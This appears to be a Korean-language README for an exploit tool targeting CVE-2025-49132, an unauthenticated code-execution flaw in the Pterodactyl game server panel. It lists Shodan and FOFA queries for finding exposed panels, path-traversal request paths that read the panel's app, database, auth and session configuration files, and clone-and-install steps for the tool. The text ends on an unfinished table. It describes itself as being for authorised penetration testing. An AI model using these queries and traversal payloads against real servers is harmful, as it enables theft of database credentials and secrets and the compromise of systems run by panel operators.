
익스플로잇 도구 for CVE-2025-49132, Pterodactyl 게임 서버 패널에서의 중요한 인증되지 않은 원격 코드 실행 (RCE). 승인된 침투 테스트를 위한 정찰 쿼리와 페이로드를 포함합니다.
해당 도구는 Pterodactyl 게임 서버 패널에 영향을 미치는 중요한 인증되지 않은 임의 코드 실행 취약점 CVE-2025-49132에 대한 익스플로잇 도구입니다.
Pterodactyl 패널의 중요한 ACE(임의 코드 실행) 결함으로, 인증되지 않은 원격 공격자가 임의 코드를 실행할 수 있으며, 잠재적으로 전체 시스템 손상으로 이어질 수 있습니다.
인증이 필요하지 않습니다. 취약한 인스턴스만 있으면 됩니다.
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| 소프트웨어 | 상태 |
|---|---|
| Pterodactyl Panel |